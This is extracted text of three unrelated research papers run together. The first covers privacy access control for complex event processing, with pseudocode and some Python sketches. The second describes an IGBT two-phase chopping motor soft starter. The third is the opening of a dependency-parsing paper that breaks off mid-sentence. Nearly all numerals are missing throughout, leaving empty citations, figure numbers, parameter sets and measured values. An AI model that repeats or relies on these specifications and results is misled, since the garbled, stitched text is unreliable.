this presents the cep technology with huge responsibility with respect to the privacy security protection in detecting information. up to now, there are few studies on cep privacy security access control, thus the research result in such aspect is just in the initial stage. in order to hold back over-class information access, literature [ ] conducts security access expansion for the cep detection and event model, which effectively prevents the unauthorized information from being leaked or tampered to the outside. it first increases two attribute fields, i.e. "security level" and "current stage", behind the traditional event model, and then adds security level checker in the query matching tree. the checker allows the event the security level of which is lower than the level set by this query matching tree to inflow so as to realize access control of the information at different security levels. literature[ , ]designs a set of novel security access operators and comes up with a re-query method based on such operator set with the relation algebra and query graph model of aurora as well as the view idea of the traditional international journal of advanced network, monitoring and controls volume , no. , database management system. through this method, the security access operators are able to be inserted to the aurora query graph model in the most effective way. as a result, cep can perform security access control on the data flow in pursuant to the predefined security strategy file. the above studies share the same thought, i.e. rewrite the query of the cep event pattern, adjust the original performing structure, and insert specialized security detecting unit to form an operation structure combining security and the original detection pattern. such kind of method is complex and has some deficiencies. . users have different security strategies, thus it is necessary to save all relevant user security strategies in the security detection unit when performing multiple user security strategies in one cep query, which obviously will cause logical mess in the course of performance. . the newly added security detection unit will produce more work load in the process of cep detection and influences its execution efficiency, meanwhile the mixed operation structure will be hard to be optimized (e.g. share intermediate result). in order to avoid the above problems, this article will put forward an efficient cep privacy security access control framework that is feasible and easy to be integrated. ii. cep privacy security access control object the basic unit of cep processing work is event. thus, the content of its privacy security access control is the information included in the event. according to the event model definition provided by the author in the early stage of the study (event_model:= event_type @ (attribute_name[data_type]n) n≥ ;), event is a tuple composed of n attributes (a ,…,an) and attribute field is the minimum unit saved by the information value. therefore, this paper determines event attribute as the object of cep privacy security access control and explain its concept in the form of definition. definition event attribute it specifies that each event flow stri input into the cep engine contains one type and can only contain one type of event etj. certain event type etj is made of n attributes pk k≥ . 
p(stri) represents the set of all attributes included in certain event flow stri and p(etj) represents the set of all attributes included in certain event type etj, then p(stri)=p(etj) if etj∈stri. in addition, in this paper, stri.pk (or etj.pk) represents certain attribute in certain event flow (or certain event type). the user's access right to the event attribute (etj.pk|stri.pk) content meets four cases: completely read, partially read, access denied and quantity statistics. therefore, a formalized description of such four types of access control operator is firstly given. completely read operator ξ: ξ(p(eti))|ξ(p(stri)) represents complete access control right to the event attribute information in the event type (or event flow). it can be abbreviated as ξ(eti)|ξ(stri). ξ can be used for some attributes set of the event type (or event flow), ξ(eti[p ,p ,…]) p ,p ,…∈p(eti) means only the information content of some attributes (p ,p ,…) in the event type is allowed to be accessed. partially read operator ф: ф(expr)(eti)|ф(expr)(stri) means the event attribute information in the event type (or event flow) can be accessed as per the definition of the conditional expression set expr. the expression expri in expr expression set only exists as conjunction relationship, e.g. eti.location=“l ”∧ eti. temperature> , means the location attribute of such event is l , and the temperature value attribute is greater than . access denied operator ψ: ψ(p(eti))|ψ(p(stri)) represents complete denial of the access to the event attribute information in the event type (or event flow). it can be abbreviated as ψ(eti)|ψ(stri). likewise, operator ψ can also only deny the access to some attributes, ψ(eti[p ,p ,…]) p ,p ,…∈p(eti) means only the information content of some attributes (p ,p ,…) in the event type is denied to be accessed. quantity statistics operator Ω: this access operator corresponds to aggregate operations that do not care the specific value of the event attribute but concern the total number, mean value and other statistics information of the event. Ω(f(pk))(eti)|Ω(f(pk))(stri) means it has statistical right to the event attribute pk in the event type (or event flow), of which, f is calculation function, including min, max, count, avg and sum, etc. international journal of advanced network, monitoring and controls volume , no. , in pursuant to the above formalized description of the control operators of security access to event attribute (record all operators set Э), the content to which the user may have privacy security access for the cep input event flow should substantially be the result of Э operation on the input event flow by such user. that is to say, only the information in line with the given user security strategy is filtrated. based on this, this article defines cep privacy security access control object as follows. definition privacy security access control object the privacy security access control object in cep engine is, of which, strs is the input event flow set of the cep engine, Э is the set of the security access control operators of event attribute, and pi is the event attribute set in the event flow. event attribute privacy security access operator Э event attribute object strs.atts hierarchy role authorize users allot figure . 
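To make the four operators concrete, the Python sketch below applies them to an event represented as a plain attribute dictionary. The event layout, function names, and the running-count form of the quantity-statistics operator are illustrative assumptions for this sketch, not the engine's actual interfaces.

```python
# Illustrative semantics of the four event-attribute access operators:
# ξ completely read, ф partially (conditionally) read, ψ access denied,
# Ω quantity statistics. Events are modelled as plain dictionaries here.

def completely_read(event, allowed_attrs=None):
    """ξ: pass the attribute values through, optionally only a chosen subset."""
    if allowed_attrs is None:
        return dict(event)
    return {k: v for k, v in event.items() if k in allowed_attrs}

def partially_read(event, conditions):
    """ф: forward the event only if every conjunctive condition holds."""
    return dict(event) if all(cond(event) for cond in conditions) else None

def access_denied(event, denied_attrs):
    """ψ: remove the attributes whose content must not be accessed."""
    return {k: v for k, v in event.items() if k not in denied_attrs}

class QuantityStatistics:
    """Ω: expose only aggregate information (here a running count) of one attribute."""
    def __init__(self, attr):
        self.attr, self.count = attr, 0

    def apply(self, event):
        self.count += 1
        # The event is repacked so that only the counted attribute flows onward.
        return {self.attr: event.get(self.attr)}

event = {"id": 17, "timestamp": 1400000000, "location": "l1", "temperature": 35}
print(access_denied(event, {"location", "temperature"}))          # ψ on two attributes
print(partially_read(event, [lambda e: e["location"] == "l1",
                             lambda e: e["temperature"] > 30]))   # ф with a conjunction
omega = QuantityStatistics("id")
print(omega.apply(event), omega.count)                            # Ω keeps only id
```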
privacy security access control model as shown from the above definition, when allocating security access control right to a user, the system administrator needs to explicitly designate the privacy security protection object to which such user can access for such user, i.e. designate the access right to each event attribute content for such user. this will bring huge work load for the system administrator. in order to operate flexibly and conveniently as well as reduce the work load on right allocation, this paper divides the security access control right of users based on the rbac model and hierarchy role thought. as shown in fig. , hierarchy role applies tree structure. high level role may include several predecessor roles and will automatically inherit the security access rights of all predecessor roles to event attribute. similarly, a user instance may have one or more role identities so as to realize flexible role allocation. iii. cep privacy security access control frame according to the above privacy security access control object, this paper presents cep security access control framework (cep-sacf) as shown in fig. . cep-sacf is easy to be realized without changing the original cep implementation structure. senior manager privacy protection object system user common user privacy protection engine privacy protection engine system user cep pattern execution space designate assign access control register register login login common user cep pattern execution space cep gui e v en t st re am b u s figure . cep privacy security access control framework international journal of advanced network, monitoring and controls volume , no. , cep-sacf operation includes three stages, i.e. user role authorization, pattern registration and privacy security access control. first of all, at the user role authorization stage, senior system administrator defines the privacy security access control object, designates corresponding security access operation to the event attribute requiring privacy protection and allocates it to the designated user role (user role is planned by level,[ , ]to reduce authorization work load); then, the user logs in with the role allocated and enters cep engine management interface where user may define its own business rule with cep event pattern language[ ], cep manages gui and will correlate the security rules related to such user role in the privacy security access control object strategy file to detect the legality of the event pattern to be registered. if there is no conflict of security rules, then such event pattern will be registered in the independent implementation space of such user role (at the time of the first registration, an independent operation space should be firstly created for such user role, and the event pattern hereafter will be registered under the namespace with the same name as the registered user role). if the event attribute content requested by the event pattern to be accessed is in conflict with the privacy security rules of this role, then a prompt of limited user right will show and registration of such event pattern will be denied; finally, the independent privacy security protection engine will operate between the input event flow and cep engine. 
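The hierarchical-role idea described above, where a higher-level role automatically inherits the event-attribute rights of all its predecessor roles and a user instance may hold several roles, can be sketched as follows. The class layout and the way a right is keyed by an (event attribute, operator) pair are assumptions made only for illustration.

```python
# Hypothetical sketch of hierarchical roles: a role inherits the access rights
# of all predecessor roles, and a user instance may carry one or more roles.

class Role:
    def __init__(self, name, parents=(), own_rights=()):
        self.name = name
        self.parents = list(parents)
        self.own_rights = set(own_rights)   # e.g. ("Temperature.id", "Ω")

    def effective_rights(self):
        rights = set(self.own_rights)
        for parent in self.parents:         # inherit everything granted to predecessors
            rights |= parent.effective_rights()
        return rights

class User:
    def __init__(self, name, roles):
        self.name, self.roles = name, list(roles)

    def rights(self):
        if not self.roles:
            return set()
        return set().union(*(role.effective_rights() for role in self.roles))

operator_role = Role("operator", own_rights=[("Temperature.id", "Ω")])
analyst_role = Role("analyst", parents=[operator_role],
                    own_rights=[("Temperature.value", "ξ")])
print(User("alice", [analyst_role]).rights())   # analyst inherits the operator's right
```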
each pspe just saves the privacy security rules related to such user role and will make operations of permission (completely read operator ξ), rejection (access denied operator ψ), filtration (partially read operator ф) or modification (quantity statistics operator Ω) for the event attribute in accordance with the definition of privacy security access operator of event attribute Э. the event processed by operator Ω will be repacked. for example, certain event contains (id, timestamp, location) attribute previously and such event only permits calculate the total number (perform Ω operation for its id attribute). other attributes are private information that is not permitted to be accessed. then under the function of operator Ω, pspe will allow all such events to pass with the private information contained flowing through the event removed. a new event only containing id attribute will be generated. then it will be sent to the corresponding operation space. furthermore, in order to ensure security of cep output result, pspe will also receive the output in the operation space protected by it and send the result to the user within the user role of such space. to ensure that under the registered event pattern, the user will not acquire the privacy security access right designated to such user role beyond the senior administrator and guarantee the efficiency of legal detection, this article verify the event pattern registered by the user with the following algorithm. algorithm validity verification algorithm of cep privacy security access control in event pattern input: the event pattern declared by the user and user role; output: the event attribute array nprops[] without legal access right in the event pattern definition; . if (find prop.aggregation(*) in event_pattern)==true props<string,string>.put(eventtype,aggregation_operator_name); . iterator (expression in where clause ) { eventtype=get_eventtype(in expression); property=get_ property(in expression); props<string,string>.put(eventtype, property);} . for(map.entry<string, string> entry:props.entryset()){ select * from secunity_rule where user_role=login_user_role; for( dataset.hasnext() ){ if (dataset[i].eventproperty==entry.getkey()) if (nolegality(dataset[i].accessoperator,entry.getvalue())==ture) nprops[entry.getvalue()];}} . system.out.println(nprops[]); international journal of advanced network, monitoring and controls volume , no. , iv. privacy security protection engine (pspe) pspe is independently created with cep event pattern implementation space. its content is determined by the privacy security access control rules defined by the senior system administrator and automatically updated depending on the adjustment of the rules. the basic mechanism of pspe operation is copy, i.e. regard the event flow input into cep engine as data bus and send the copy of the event in line with the privacy security protection rules on the data bus to the event pattern detection network inside the operation space. beyond that, no operation will be made. this mechanism can effectively guarantee the event flow will flow through all privacy security protection engines and finally pass the event containing correctly authorized information to cep processing nodes. the working principle inside pspe is shown in fig. . it will convert the filtration operation of the event attribute to the tree structure with the event type as the root node, of which, eventtype is the event type that can be processed in this space. 
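Before continuing with the detecting tree, the validity-verification algorithm above can be transliterated roughly as follows. The pattern and rule representations are simplified stand-ins (the real algorithm walks the pattern's aggregation clause and WHERE expressions); only the overall control flow is mirrored here.

```python
# Rough, simplified transliteration of the pattern-validity check: collect the
# (event type, attribute) pairs a pattern touches, look them up in the role's
# security rules, and report every attribute accessed without a legal right.

def illegal_attributes(pattern, role_rules):
    """pattern    : {'aggregations': [(etype, attr)], 'where': [(etype, attr)]}
    role_rules : {(etype, attr): operator}, operator in {'ξ', 'ф', 'ψ', 'Ω'}"""
    where_attrs = set(pattern.get("where", []))
    touched = set(pattern.get("aggregations", [])) | where_attrs
    nprops = []
    for etype, attr in touched:
        op = role_rules.get((etype, attr), "ψ")        # unspecified attribute: deny
        # ψ never permits access; Ω permits aggregation only, not value comparison.
        if op == "ψ" or (op == "Ω" and (etype, attr) in where_attrs):
            nprops.append((etype, attr))
    return nprops

rules = {("Temperature", "id"): "Ω", ("Temperature", "value"): "ξ"}
pattern = {"aggregations": [("Temperature", "id")],
           "where": [("Temperature", "location")]}
print(illegal_attributes(pattern, rules))   # -> [('Temperature', 'location')]
```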
the subnode under the root node of the event type is the event type included. the event attribute node will be included in the access operation defined in the privacy security protection rules (as one event attribute can only define one type of security access operation type, the event attribute node only contains one subnode). here are some kinds of common detecting tree in pspe. as shown in fig. (a), suppose certain event type contains three event attributes and for certain user role, these three event attributes are all permitted to be accessed, thus the combined node will pass such event to the internal implementation space completely. it is contrary in fig. (b) where the three attributes of the event are denied to be accessed, and such event will not be passed internally. fig. (c) shows the general situation under privacy security access control, i.e. user role is only allowed to access to some attribute content of one event while the private part is not permitted to be viewed. as attr attribute is denied to be accessed, the node of such detecting tree will only combine attr and attr attributes and outputs a new event which only contains these two attributes. fig. (d) displays the appearance of the detecting tree which conditionally reads the event attribute, of which, the condition verification includes single value comparison (as shown in figure (e), the comparison content: attr = value && attr != value ) and multiple value comparison (as shown in fig. (d), the comparison content: value <attr < value ). the node will only allow the event whose comparison result is true to pass through. fig. (f) shows the situation of event attribute statistics and calculation. the node will permit such event attribute content to be accessed and the function of node Ω is equivalent to ξ. as known from the above common detecting tree structure, pspe is able to effectively prevent the unauthorized information from inflowing and using. by means of repackaging the event, the separation of the authorized and unauthorized information can be guaranteed. international journal of advanced network, monitoring and controls volume , no. , event type attr ξ ξ ξ attr attr attrs∪ event type attr ψ ψ ψ attr attr event type attr ξ ψ ξ attr attr attrs∪ event type attr Ω ψ ф attr attr attrs∪ [=,value ] (a) (b) (c) (f) event type attr ξ ф ξ attr attr attrs∪ [<,value ] [>,value ] (d) event type attr ф ξ ф attr attr [=,value ] [!=,value ] (e) attrs∪ figure . detection tree structure in privacy security protection engine v. performance test of privacy security access control framework the core part of cep-sacf operation is pspe, the operation performance of which is related to the input event flow rate and the total quantity of the internally registered detecting tree (record such parameter as ets). the above content shows that the working efficiency of the detecting tree is related to the number of internal event attribute node (record such parameter as ats) and the node type of the access operator (record such parameter as ops). therefore, this group of experiment will test the three parameters that influence the efficiency of the engine respectively. first of all, simulate the input event flow, each of which only contains one type of event. each event is composed of one event type attribute field and several other attribute fields. the event flow generator will utilize multiple courses to produce event flow in parallel and send it out to simulate real scene. 
then, the buffer queue of pspe will receive these events and conduct security detection by the first-in-and-first-out sequence. the detecting tree indexes with the hash table and realizes it with the custom tree structure. international journal of advanced network, monitoring and controls volume , no. , (a) experiment influence of detection tree number (b) experiment influence of event attribute number (c) event attribute security access operator efficiency test figure . privacy security protection engine performance testing experiment i registers three groups of ets={ , , } with different quantity for contrast. it receives data at , - , events/s and provides that the attribute quantity included in all events of such group of experiment is . the event attribute access operator is completely read operator ξ. as known from fig. (a), as the input rate increases, the time taken by pspe presents a linear growth trend, but the rise of total ets has little influence on pspe implementation efficiency because hash index has a high efficiency. the growth of total ets has little influence on its index rate. experiment ii tests the three control groups in which the attribute quantity of the event is ats={ , , }. the total detecting tree registered in such group of experiment is ets= (thus, the actual total number of the attribute detecting tree in pspe is , and , respectively). also, it receives data at , - , events/s and provides that the event attribute access operator of all attributes is completely read operator ξ. as known from fig. (b), parameter ats has a great influence on the implementation efficiency of pspe. as the total ats increases, the calculated amount of the traversal node inside pspe will undergo a cumulative rise. the processing time taken by the three control groups basically keeps a multiple relationship. the total consuming time of pspe is at millisecond level, which has little influence on the overall operation efficiency of cep-sacf. experiment iii tests the performance of ξ, ф and ψ (as Ω and ξ is different in function, repeated test will not be done for Ω). this group of experiment provides ets= , ats= , ops={ξ, ф, ψ}, with the data flow rate the same as above. the conditional expression of ф is [>, ]. that is to say, in spite of conditional judgment, all events are permitted to pass through. according to fig. (c), as ψ denies events to pass through and there is no subsequent treatment. thus, it consumes the shortest time (only including the time consumed in event type node searching and event attribute transversing). ф has calculation of conditional judgment on its node, so it consumes more time than the benchmark ξ operation. however, they come to the same conclusion that for different operators at different input rate, the total time international journal of advanced network, monitoring and controls volume , no. , consumed in processing by pspe can still keep at millisecond level, which represents high operation efficiency. vi. conclusion the experimental result shows that pspe has a high implementation efficiency. at the same time, it is able to deal with different user roles in different ways, filtrate the event information not allowed to be accessed and generate new events in line with privacy security access control requirement. thus, it has a feature of customizability. in addition, pspe is completely integrated outside of cep engine, which is very feasible because it has no influence on its original implementation structure and operation efficiency. 
It has clear application value because it performs privacy security detection effectively on the event information entering and leaving the CEP engine.

Acknowledgment
This work was supported by the Industrial Research Project of the Science and Technology Department and the Office of Education of Shaanxi Province (grant nos. ktzdgy - , jz ) and the Xi'an Technological University Principal Fund (grant no. xagdxjj ).

References
[ ] Luckham D. The Power of Events: An Introduction to Complex Event Processing in Distributed Enterprise Systems. Springer.
[ ] Buddhika T, Ray I, Linderman M, Jayasumana A. Secure complex event processing in a heterogeneous and dynamic network. In: SPIE Defense + Security, International Society for Optics and Photonics.
[ ] Carminati B, Ferrari E, Tan K L. Enforcing access control over data streams. In: Proceedings of the ACM Symposium on Access Control Models and Technologies, ACM.
[ ] Carminati B, Ferrari E, Cao J, Tan K L. A framework to enforce access control over data streams. ACM Transactions on Information and System Security (TISSEC).
[ ] Tang Jin-peng, Li Ling-lin, Yang Lu-ming. User attributes oriented RBAC model. Computer Engineering and Design.
[ ] Xiong Hou-ren, Chen Xing-yuan, Zhang Bin, Yang Yan. Security principles for RBAC-based authorization management. Computer Science.
[ ] Jing Xin, Zhang Jing. Research on parallel CEP processing with the multi-event pattern sharing capability. Journal of Xi'an Technological University.

International Journal of Advanced Network, Monitoring and Controls

The Design of a Two-Phase Chopping Voltage-Regulation Soft Starter

Jingwen Chen*, Hongshe Dang
School of Electrical and Information Engineering, Shaanxi University of Science & Technology, Xi'an, China

Abstract. The commonly used thyristor soft starter suffers from a complex trigger-pulse control method, poor continuity of the stator current, serious waveform distortion, and high harmonic content. To address these problems, an AC chopping voltage-regulation soft starter based on IGBTs is designed; it controls two phases of the AC supply to achieve three-phase voltage control, preserving the starting performance while saving cost. The paper analyzes the starting performance of the two-phase chopping, fully controlled soft starter by MATLAB simulation and presents the design of its hardware circuit and software.

Keywords: IGBT, two-phase chopping, asynchronous motor, soft starter

1. Introduction
In motor applications, the starting of the motor is a particularly important problem. When an asynchronous motor starts, the transient current surge is large, generally several times the rated current and sometimes more. An excessive starting inrush current adversely affects the motor itself, the normal operation of other electrical equipment, and the power grid. Because thyristors are half-controlled devices and the current is discontinuous, the thyristor voltage-regulation soft starters in current use produce substantial low-order harmonics, causing harmonic pollution, seriously distorting the output voltage waveform, and degrading the dynamic characteristics of the motor [ - ].
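As a small numeric illustration of the chopping idea developed in the next section (the stator voltage is set by the duty ratio of the IGBT trigger pulses rather than by thyristor firing angles), the sketch below ramps a commanded duty ratio linearly over the start window. The linear shape and the parameter values are assumptions chosen for illustration, not the controller described in this paper.

```python
# Hypothetical duty-ratio profile for a voltage-ramp soft start: the IGBT
# trigger-pulse duty ratio is raised from an initial value towards 1.0 (full
# voltage), so the average stator voltage rises without firing-angle control.

def duty_ratio_ramp(t, start_time=10.0, d_initial=0.3, d_final=1.0):
    """Commanded duty ratio at time t (seconds) during the start window."""
    if t <= 0.0:
        return d_initial
    if t >= start_time:
        return d_final
    return d_initial + (d_final - d_initial) * t / start_time

for t in (0.0, 2.5, 5.0, 7.5, 10.0):
    print(f"t = {t:4.1f} s  duty ratio = {duty_ratio_ramp(t):.2f}")
```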
because of using all control devices, the two phase chopping regulating all control type soft starter can be shut off by self and can achieve the stator voltage stepless regulation by changing duty ratios of the trigger pulse. its advantage is that igbt trigger pulse does not need to link the phase of the three-phase bus voltage, and has no need to test the zero crossing point. it regulates voltage by adjusting the duty ratios of trigger pulse without calculating the firing angle; the control algorithm and the implementation method are relatively simple. in the use of the freewheeling circuit, the motor current and voltage waveform become much closer to the sine wave, and the waveform distortion rate becomes low [ - ]. . the main circuit of two phase chopping regulating soft starter the two phase chopping regulating all control type soft starter is by controlling the duty ratio of all control devices igbt trigger pulse to adjust the input voltage of stator from power grid, so as to adjust the size of the starting electromagnetic torque. specifically it’s adjusting the three-phase output voltage size by controlling the output voltage of the two phase. the main circuit topology structure is shown in the design of two phase chopping regulation voltage soft starter fig. the specific voltage regulation methods are as follows: the main circuit structure adopts four power diodes, an insulated gate bipolar transistor and its corresponding protection circuit, to form two groups of basic single-phase ac voltage regulation circuit ( ), ( ), respectively concatenated in the power supply phase a and phase b of the three-phase ac asynchronous motor. in addition, it adopts six power diodes, an insulated gate bipolar transistor and its corresponding protection circuit, to form a three-phase freewheel bridge ( ). the three-phase freewheel bridge connects ac voltage regulation circuit to three-phase ac asynchronous motor stator winding. in order to detect and control the starting current, set up current transformer ( ), ( ), ( ) to a, b, c phase power line of the three-phase ac asynchronous motor respectively. then the current signal tested by the current transformer will be send to the microprocessor control system ( ). on the main circuit control, the control pulse generated by the microprocessor control system has two ways, one triggers the insulated gate bipolar transistor ( ), ( ) of two sets of ac voltage regulation ( ), ( ) shown in diagram, the other triggers the insulated gate bipolar transistor ( ) of the three-phase freewheel bridge dc side. the positive and negative of these two pulses are exactly opposite, and they are complementary pulse. therefore, when ( ), ( ) trigger on, ( ) shuts off , then three-phase ac power supplies to three-phase ac asynchronous motor; when the ( ), ( ) shut off, ( ) triggers on, then three- phase ac asynchronous motor stator current follow current by three-phase freewheel bridge. figure. the main circuit structure of two phase chopping regulating soft starter . start modes the soft starter has a variety of start modes: voltage ramp start, voltage ramp start with pulse kick, current-limiting start, dual ramp start, etc. the maximum allowable time during start process can be set as starting time parameter, and starting time limit range is: - s, the default value is s. the start-up way is as follows: for voltage ramp start, the user can set up an initial starting torque, and this initial starting torque corresponds to an initial starting voltage. 
the voltage of the motor increases at a fixed growth rate from the initial starting voltage by a constant speed, until up to the rated voltage. and the growth rate of voltage can be adjusted to adapt to different starting times. a b c m a b c ( ) mcu ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) d d d d d d d d d d d d d d ( ) ( ) ( ) ( ) international journal of advanced network monitoring and controls volume , no. , voltage ramp start with pulse kick is the mode that gives the motor with a higher starting voltage for a short period of time in the motor starting moment, making the motor produce a large instantaneous torque to overcome the static friction torque under the static state, and making the motor turn up. its main application is on overloading starting motor. current-limiting start provides the motor decompression start with a fixed current, used to limit the maximum starting current, which is mainly used in the occasion of the need to limit the impact current when starting[ - ]. current-limiting start needs to cooperate with the effective value of current detection circuit. the program contains the pid current limit control algorithm, fuzzy control algorithm or combining fuzzy and pid control algorithm, etc. [ ], which makes the motor current won’t exceed the maximum value during the process of start, as the voltage ramp starts without a maximum value range, providing a kick torque start. the current-limiting start current limit value can be set in ~ times of the rated current. dual ramp start, similar to voltage ramp start, corresponds to two different rates of voltage rise. these two start solutions are set in advance. according to their practical application , users could store two commonest start modes in the soft starter, in order to set the starting parameters quickly to start motor. slope starts from % of the full voltage, lasts s, and linear increases to full voltage. slope starts from % of the full voltage, lasts s, and linear increases to full voltage. the motor can also firstly start by the slope . the initial torque is higher, but the voltage rise slowly, which makes the current of the motor change not severe. when the motor speeds up, the current will be reduced, making the motor rise to full voltage rapidly, and completing the start. . the simulation analysis of two phase chopping regulating all control type soft start based on the main circuit of two phase chopping regulating all control type soft starter shown in the figure. , the simulation model shown in fig. is built. simulation parameter settings are as follows: igbt switching frequency is khz, trigger pulse duty ratio . , three-phase ac power source v, hz, asynchronous motor rated power kw , rated voltage v, rated frequency hz,and the load torque n•m. figure. the main circuit model of two phase chopping regulating soft starter the design of two phase chopping regulation voltage soft starter the stator current simulation result of two phase chopping regulating all control type soft starter is shown in fig. , it can be shown from the diagram that the stator current fluctuation is significantly decreased than that of thyristor regulating soft start, and the biggest stator current is about times than that of stable operation when starts [ - ] . figure. the stator current simulation result of two phase chopping regulating soft starter fig. is the speed and torque simulation results of two phase chopping regulating all control type soft starter. 
it can be reflected: the revolving speed of two phase chopping regulating all control type soft starter rises faster, and the rising process is smoother. the time to stabilization is also ahead of thyristor regulating soft starter. the starting torque of two phase chopping regulating all control type soft starter is smoother, there’s no peak impact torque. fig. is the stator current local amplification figure of two phase chopping regulating all control type soft starter. it can indicated from the picture that as igbt works under the high switch frequency, the stator current waveform is very close to the sine wave, and the stator current is continuous. discontinuous phenomenon hardly appears for a while near zero. figure. the speed and torque simulation results of two phase chopping regulating soft starter figure. the stator current local amplification figure of two phase chopping regulating soft starter international journal of advanced network monitoring and controls volume , no. , fig. is the fft analysis of two phase chopping regulating soft starter a phase stator current simulation results. it can be presented that the main harmonic frequency is , , , , and the total harmonic factor is only . %, compared with thyristor regulating soft start. the total harmonic factor has fallen by half. the harmonic content of and is higher, and they belong to higher harmonic, easy to be filtered through the filter circuit. figure. the fft analysis of two phase chopping regulating soft starter a phase stator current through the analysis of simulation results, it confirms that the two phase chopping regulating all control type soft starter has the advantages: small starting current, smooth starting torque, low total harmonic content, and low harmonic content, compared with thyristor regulating soft starter. . the hardware circuit design of two phase chopping regulating all control type soft starter the hardware schematic diagram of two phase chopping regulating soft starter is shown in fig. . it mainly includes several main parts: the main control chip stm [ ], communication circuit, current detection circuit, usb to serial communication circuit, the cpld circuit, voltage detection circuit, drive circuit, power circuit. every subcircuit needs to be connected with the corresponding power supply circuit, without showing the specific connection in the picture. figure. the schematic diagram of two phase chopping regulating soft starter drive circuit communication circuit usb to serial communication circuit current detection circuit the main control chip stm voltage detection circuit cpld circuit the design of two phase chopping regulation voltage soft starter . the software design of two phase chopping regulating all control type soft start system . the design of main program as the central control system, two phase chopping regulating soft start main program, has command and deployment effects to the behavior of each program of the control system .the main program flow chart of control system is shown in fig. . simple its structure is, it is the soul of the whole control system, and has irreplaceable importance. the detailed working process is displayed below. figure. the main program flow chart of control system first of all, the control system must initialize the main control chip internal various registers and each external pin operation after power-on. 
then run a series of system detection subroutines by reading the corresponding parameters of pin, to judge whether the current environment of the motor could start. the operation of the main subroutines on the stage includes phase sequence detection, lack of phase detection, temperature detection. if the detect results conform to the motor starting, it will enter to scan key link. this link uses to monitor whether the control signals are input by the human through the keyboard. if so, the process enters the key processing steps, then the relevant subroutines process the control of the input signal, and wait for starting. if the output of detection subroutines does not conform to the motor starting, the system will enter the fault process which will be displayed. after the fault processed, test whether it conforms to the motor starting conditions. . the design of main program current-limiting starting mode is a more detailed starting mode, which highlights the current size start initializati on fault? fault process and display key scan system check key process yes no yes no international journal of advanced network monitoring and controls volume , no. , control in the process of motor starting. it needs to feedback the real-time current to the main control system in the process of motor starting , then by the comparing the value of the real-time current with the set current, the main control system generates control signal, adjusts the igbt trigger pulse duty ratio, and then makes the motor starting current near the set value within a range. this way of starting is relatively complex. figure. flow chart of current limiting soft start the biggest starting current of the current-limiting starting is generally no more than four times of the electric motor rated current. usually the current limit control algorithm has pid method, fuzzy control method, the combination of pid and fuzzy control method, and so on. this article uses the fuzzy control method. flow chart of current limiting soft start is shown in fig. . . conclusion this paper proposes the two phase chopping regulating all control type soft starter. its starting current, starting torque, total harmonic content and the stator current waveform, are all superior to the thyristor voltage regulating soft starter. the paper proposed the hardware circuit and the software program of the two phase chopping regulating all control type soft starter. the harmonic content of the two phase chopping regulating all control type soft starter is lower. compared with thyristor regulating soft starter, the starting current is closer to the sine wave, and with good continuity, control algorithm is simple, the protection circuit is complete, the system has high stability and easy maintenance, and large starting < initialization read the set value compared with the set value reduce the duty ratio > start end the start over yes no keep whether reach ms no increase the duty ratio delay read the current value delay read the current value compared with the set value keep = < stop and report the fault = > yes set the duty ratio size the design of two phase chopping regulation voltage soft starter torque is continuous adjustable. with use less of power electronic devices, the equipment controls the two phase to achieve the purpose of control three phase, saving costs. it’s a method of ac asynchronous motor soft start worth promoting. acknowledgment the authors wish to thank shaanxi provincial government. 
This work was supported in part by the Industrial Research Project of the Science and Technology Department of Shaanxi Province (fund number: gy ).

References
[ ] Hu Hongming, "The study of asynchronous motor soft start", Master thesis, Huazhong University of Science and Technology, Wuhan, China.
[ ] Sun Jinji, Fang Jiancheng, Wang Jianmin, "The shock in the process of asynchronous motor soft start", Transactions of China Electrotechnical Society.
[ ] Fan Liping, Zhang Liang, "Fuzzy simulation of asynchronous motor soft start", Transactions of Power System and Automation.
[ ] Fan Liping, Hu Wenhao, "The study of combination of filtering function asynchronous motor soft start", Electric Drive.
[ ] Meng Yanjing, Gong Wenzhan, "The hardware design of the intelligent soft starter control system", Small & Special Electrical Machines.
[ ] Shicheng Zheng, Hong Zhu, Xiaohu Cao, Weihua Wu, Qianzhi Zhou, "Research and implementation of a novel single phase AC/AC variable frequency technology", High Voltage Engineering.
[ ] G. Zenginobuz, I. Cadirci, M. Ermis, C. Barlak, "Soft starting of large induction motors at constant current with minimized starting torque pulsations", IEEE Industry Applications Conference.
[ ] Xiuhua Zhang, Lin He, Guangxi Li, Zhou Zhou, "The analysis of structure strength and calculation of critical speed of a new type of high-speed permanent magnet motor", Energy Education Science and Technology Part A.
[ ] Yunrui Wang, "Study on electric furnace power quality integrated control system", Energy Education Science and Technology Part A.
[ ] Zhongxian Wang, Yonggeng Wei, Chunyan Li, "Study on APFC circuit in the single-phase variable frequency power supply", Energy Education Science and Technology Part A.

Transactions of the Association for Computational Linguistics

Branch and Bound Algorithm for Dependency Parsing with Non-local Features

Xian Qian and Yang Liu
Computer Science Department, The University of Texas at Dallas
{qx,yangl}@hlt.utdallas.edu

Abstract
Graph based dependency parsing is inefficient when handling non-local features due to the high computational complexity of inference. In this paper, we propose an exact and efficient decoding algorithm based on the branch and bound (B&B) framework, in which non-local features are bounded by a linear combination of local features. Dynamic programming is used to search the upper bound. Experiments are conducted on the English PTB and Chinese CTB datasets. We achieve competitive unlabeled attachment scores (UAS) for both English and Chinese when no additional resources are available, at practical parsing speeds. Our algorithm is general and can be adapted to non-projective dependency parsing or other graphical models.

Introduction
For graph based projective dependency parsing, dynamic programming (DP) is popular for decoding due to its efficiency when handling local features. It performs cubic time parsing for arc-factored models (Eisner; McDonald et al.) and bi-quadratic time for higher order models with richer sibling and grandchild features (Carreras; Koo and Collins).
however, for models with gen- eral non-local features, dp is inefficient. there have been numerous studies on global in- ference algorithms for general higher order parsing. one popular approach is reranking (collins, ; charniak and johnson, ; hall, ). it typi- cally has two steps: the low level classifier gener- ates the top k hypotheses using local features, then the high level classifier reranks these candidates us- ing global features. since the reranking quality is bounded by the oracle performance of candidates, some work has combined candidate generation and reranking steps using cube pruning (huang, ; zhang and mcdonald, ) to achieve higher or- acle performance. they parse a sentence in bottom up order and keep the top k derivations for each s- pan using k best parsing (huang and chiang, ). after merging the two spans, non-local features are used to rerank top k combinations. this approach is very efficient and flexible to handle various non- local features. the disadvantage is that it tends to compute non-local features as early as possible so that the decoder can utilize that information at inter- nal spans, hence it may miss long historical features such as long dependency chains. smith and eisner modeled dependency parsing using markov random fields (mrfs) with glob- al constraints and applied loopy belief propaga- tion (lbp) for approximate learning and inference (smith and eisner, ). similar work was done for combinatorial categorial grammar (ccg) pars- ing (auli and lopez, ). they used 